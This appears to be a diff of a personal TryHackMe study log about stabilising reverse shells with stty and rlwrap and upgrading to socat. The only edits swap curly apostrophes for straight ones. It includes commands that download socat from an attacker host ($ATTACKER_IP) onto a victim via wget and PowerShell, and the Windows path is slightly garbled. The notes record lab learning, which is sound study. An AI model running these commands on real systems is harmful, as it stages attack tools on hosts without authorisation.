cardboard-iguana/cardboard-iguana.com/log/2021-10-27-tryhackme-complete-beginner.md

 Note that the `stty` command can be canceled using `reset` (after closing the reverse shell).
 Since echo is turned off, typing this won't be visible.
 Trust the force!

-You can *mostly* bypass the need for the `stty` command by using `rlwrap`, which sets all of this up for you (though it doesn’t redirect control sequences, so Ctrl+C will still kill the connection).
+You can *mostly* bypass the need for the `stty` command by using `rlwrap`, which sets all of this up for you (though it doesn't redirect control sequences, so Ctrl+C will still kill the connection).

-It’s also possible to upgrade to a socat-powered shell, assuming that you have a statically-compiled version of socat.
-Typically, the way that you’d transfer this binary is by first spinning up a simply webserver in the directory with your socat binary on the attack machine, and then downloading that binary to the vicitim.
+It's also possible to upgrade to a socat-powered shell, assuming that you have a statically-compiled version of socat.
+Typically, the way that you'd transfer this binary is by first spinning up a simply webserver in the directory with your socat binary on the attack machine, and then downloading that binary to the vicitim.

 * UNIX LIKE: `wget $ATTACKER_IP/socat -O /tmp/socat`
 * WINDOWS (POWERSHELL): `Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\Windows	emp\socat.exe`

-NOTE that in *none* of these cases will the reverse shell pick up on your terminal size, so you’ll need to manually specify it using `stty rows` and `stty cols`.
+NOTE that in *none* of these cases will the reverse shell pick up on your terminal size, so you'll need to manually specify it using `stty rows` and `stty cols`.

 * [Quick-n-Dirty Python Web Server](../notes/quick-n-dirty-python-web-server.md)